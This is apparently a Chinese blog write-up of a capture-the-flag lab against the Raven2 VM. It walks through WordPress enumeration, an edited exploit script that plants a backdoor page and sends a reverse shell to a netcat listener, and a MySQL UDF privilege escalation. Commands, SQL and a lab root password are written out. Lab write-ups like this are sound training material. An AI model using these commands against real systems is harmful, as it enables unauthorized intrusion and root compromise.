zoukankan      html  css  js  c++  java
  • skyler实战渗透笔记(四)—Raven2

    skyler实战渗透笔记:

    笔记是为了记录实战渗透学习过程,分享渗透过程思路与方法。

    请注意:

    对于所有笔记中复现的终端或服务器,都是自行搭建环境或已获授权渗透的。使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

    0x00 前言

    0x01 信息收集

    0x02 渗透get shell

    0x03 提权

    0x04 总结

    0x00 前言

    今天的目标,是上次的续章,在多次入侵后,Raven Security采取了额外的措施来加固他们的网络服务器,以防止黑客入侵。依旧是4个flag和root权限。

    0x01信息收集

    首先还是先发现目标:

    靶机ip是192.168.245.144,端口扫一下看看有什么服务:

    依然是这些端口,看来改变不大,那继续访问下80看看:

    0x02 渗透get shell

    还是原来的web博客,只不过看介绍密码被加强了。

    使用dirsearch扫一下目录:

    dirsearch -u http://192.168.245.144/

    依然还是有个vendor目录,那么点进来每个文件再看下:

    PATH文件中发现了flag1:

    看着目录中有wordpress的字眼,那么用wpscan扫一下看看有什么可用的信息:

    wpscan --url http://192.168.245.144/wordpress/

    可以看到,扫出来两个目录,一个readme,看了看没啥内容,另一个uploads访问下试试:

    目录最底层发现了flag3

     

    其他看起来没什么发现了,那么还是用昨天的方法试试:

    老规矩,先搜下漏洞,然后把要利用的这个python脚本拷贝到当前目录(可以参考上一篇文章):

    之后修改这个python文件,改成我们的目标服务器和接收端

    修改后,python执行,并且另起一个终端,监听4444端口,之后访问后门页面http://192.168.245.144/back.php:

    nc -lvnp 4444

    成功获得shell,python反弹tty终端

    获取到终端后,find搜一下flag:

    找到了flag2和刚才访问到的flag3

    0x03 提权

    依旧是上一篇的内容,udf提权:

     查看mysql版本5.5.60

     用第二个,复制1518.c并编译生成动态链接库文件(DLL)

    gcc -g -c 1518.c

    gcc -g  -shared -Wl,-soname,1518.so -o 1518.so 1518.o –lc

    -g 生成调试信息
    -c 编译(二进制)
    -shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
    -o:执行命令后的文件名
    -lc:-l 库 c库名

     开启python服务器python -m SimpleHTTPServer 5555 ,并在目标机器中下载1518.so

    OK,登录进mysql,开始udf提权:

    mysql -uroot -pR@v3nSecurity

    使用前面的python 5555服务传输到靶机
    然后通过mysql进行UDF提权
    进入数据库创建数据表 foo
    命令:create table foo(line blob);

    插入数据:insert into foo values(load_file(’/tmp/zxp.so’));

    Foo表成功插入二进制数据,然后利用dumpfile函数把文件导出
    outfile 多行导出,dumpfile一行导出
    outfile会有特殊的转换,而dumpfile是原数据导出
    新建存储函数
    命令:select * from foo into dumpfile ‘/usr/lib/mysql/plugin/zxp.so’;

    创建自定义函数do_system 类型是integer,别名(soname)文件名字
    然后查询函数是否创建成功

    命令:create function do_system returns integer soname ‘zxp.so’;

    调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令

    命令:select * from mysql.func;
    命令:select do_system(‘chmod u+s /usr/bin/find’);

    执行find命令
    使用find执行 shell
    命令:find / -exec '/bin/sh ’ ;

    成功提权查看flag4.txt

    0x04 总结

    不对劲啊,感觉跟上一篇差不多啊,也没看出哪里加固来。

    后来我搜了下其他人的渗透思路,发现上一篇搞复杂了,上一篇用wpscan直接扫描出用户名,九头蛇爆破就能搞出ssh,然后从数据库中找到sudoer的密码,md5碰撞解开就行了,靠!

  • 相关阅读:
    Educational Codeforces Round 64(ECR64)
    [网络流]BZOJ4657 tower 最小割约束
    009:JSON
    008:数据类型
    007:MySQL SSL
    006:多实例安装
    005: 存储引擎介绍
    004:MySQL数据库体系结构
    003:MySQL账号创建授权以及Workbench
    002:MySQL升级以及访问连接
  • 原文地址:https://www.cnblogs.com/Shepherdzhao/p/15260633.html
Copyright © 2011-2022 走看看